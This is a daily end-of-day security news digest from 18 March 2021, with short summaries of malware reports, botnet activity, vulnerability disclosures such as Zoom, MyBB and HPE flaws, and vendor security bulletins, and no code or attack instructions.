Tageszusammenfassung - 18.03.2021

End-of-Day report

Timeframe: Mittwoch 17-03-2021 18:00 - Donnerstag 18-03-2021 18:00 Handler: Robert Waldner Co-Handler: Stephan Richter


UK Foreign, Commonwealth & Development Office funds Shadowserver surge in Africa and Indo-Pacific regions

Can you help Shadowserver sign up more countries/networks in Africa and the Info-Pacific to receive our free daily network reports and help secure the Internet? We are running a UK FCDO funded surge in Feb/March 2021, aimed at increasing outreach and expanding our honeypot sensor network in those regions. We are seeking introductions, contacts and hosting so please get in touch if you can help us achieve these goals.


SolarWinds-linked hacking group SilverFish abuses enterprise victims for sandbox tests

Existing victim networks are used to test out payloads as a novel form of sandbox.


TTP Table for Detecting APT Activity Related to SolarWinds and Active Directory/M365 Compromise

CISA has released a table of tactics, techniques, and procedures (TTPs) used by the advanced persistent threat (APT) actor involved with the recent SolarWinds and Active Directory/M365 compromise. The table uses the MITRE ATT&CK framework to identify APT TTPs and includes detection recommendations. This information will assist network defenders in detecting and responding to this activity.


~4,300 publicly reachable servers are posing a new DDoS hazard to the Internet

DDoS-for-hire services adopt new technique that amplifies attacks 37 fold.


New XcodeSpy malware targets iOS devs in supply-chain attack

A malicious Xcode project known as XcodeSpy is targeting iOS devs in a supply-chain attack to install a macOS backdoor on the developers computer.


Convuster: macOS adware now in Rust

Convuster adware for macOS is written in Rust and able to use Gatekeeper to evade analysis.


Necro upgrades again, using Tor + dynamic domain DGA and aiming at both Windows & Linux

Back in January, we blogged about a new botnet Necro and shortly after our report, it stopped spreading. On March 2nd, we noticed a new variant of Necro showing up on our BotMon tracking radar March 2nd, the BotMon system has detected that Necro has started spreading again, [...]


Server Side Data Exfiltration via Telegram API

One of the themes commonly highlighted on this blog includes the many creative methods and techniques attackers employ to steal data from compromised websites. Credit card skimmers, credential and password hijackers, SQL injections, and even malware on the server level can be used for data exfiltration. What-s more, attackers may be able to accomplish this feat with a few mere lines of code.


Simple Python Keylogger

A keylogger is one of the core features implemented by many malware to exfiltrate interesting data and learn about the victim. Besides the fact that interesting keystrokes can reveal sensitive information (usernames, passwords, IP addresses, hostnames, ...), just by having a look at the text typed on the keyboard, the attacker can profile his target and estimate if its a juicy one or not.


Satori: Mirai Botnet Variant Targeting Vantage Velocity Field Unit RCE Vulnerability

On Feb. 20, 2021, Unit 42 researchers observed attempts to exploit CVE-2020-9020, which is a Remote Command Execution (RCE) vulnerability in Iteris- Vantage Velocity field unit version 2.3.1, 2.4.2 and 3.0. As a travel data measurement system, Vantage Velocity captures travel data with a large number of vehicles. If a device is compromised, [...]


NimzaLoader Malware

NimzaLoader is a new initial access malware that is relatively unique in its usage of the Nim programming language. Proofpoint observed this malware being distributed in a TA800 email campaign in place of BazaLoader



SYSS-2020-044: Sicherheitsproblem in Screen Sharing-Funktionalität von Zoom (CVE-2021-28133)

SySS Proof of Concept Video demonstriert ein Sicherheitsproblem in der Screen Sharing-Funktion der Videokonferenzsoftware Zoom.


Tutor LMS for WordPress Open to Info-Stealing Security Holes

The popular learning-management system for teacher-student communication is rife with SQL-injection vulnerabilities.


Critical RCE Flaw Reported in MyBB Forum Software-Patch Your Sites

A pair of critical vulnerabilities in a popular bulletin board software called MyBB could have been chained together to achieve remote code execution (RCE) without the need for prior access to a privileged account. The flaws, which were discovered by independent security researchers Simon Scannell and Carl Smith, were reported to the MyBB Team on February 22, following which it released an [...]


ZDI-21-337: Hewlett Packard Enterprise Network Orchestrator uaf-token SQL Injection Information Disclosure Vulnerability

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Hewlett Packard Enterprise Network Orchestrator. Authentication is not required to exploit this vulnerability.


ZDI-21-341: (0Day) (Pwn2Own) Sony X800H Smart TV Vewd Type-Confusion Remote Code Execution Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Sony X800H Smart TV. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.


Security updates for Thursday

Security updates have been issued by Debian (velocity-tools), Fedora (switchboard-plug-bluetooth), Mageia (discover, flatpak, and xmlgraphics-commons), openSUSE (chromium and python), Oracle (kernel, kernel-container, and pki-core), Red Hat (openvswitch2.11 and ovn2.11, python-django, qemu-kvm-rhev, and rubygem-em-http-request), and SUSE (crmsh, openssl1, and php53).


Xen: Schwachstelle ermöglicht Denial of Service


Drupal: Schwachstelle ermöglicht Offenlegung von Informationen


Security Bulletin: z/TPF is affected by OpenSSL vulnerabilities


Security Bulletin: March 2021 : Vulnerability in IBM Java Runtime affect CICS Transaction Gateway


Security Bulletin: March 2021 : Vulnerability in IBM Java Runtime affects CICS Transaction Gateway


Security Bulletin: IBM RackSwitch firmware products are affected by vulnerabilities in Libxml2


Security Bulletin: IBM RackSwitch firmware products are affected by a vulnerability in libcurl (CVE-2019-5436)


Security Bulletin: IBM Security Guardium External S-TAP is affected by an Execution with Unnecessary Privileges vulnerability


Security Bulletin: IBM Flex System switch firmware products are affected by a vulnerability in libcurl (CVE-2019-5436)


Security Bulletin: March 2021 : Multiple vulnerabilities in IBM Java Runtime affect CICS Transaction Gateway


Security Bulletin: A vulnerability in IBM® SDK, Java- Technology Edition affects IBM Spectrum Scale


Security Bulletin: IBM Resilient vulnerable to username enumeration (CVE-2020-4635)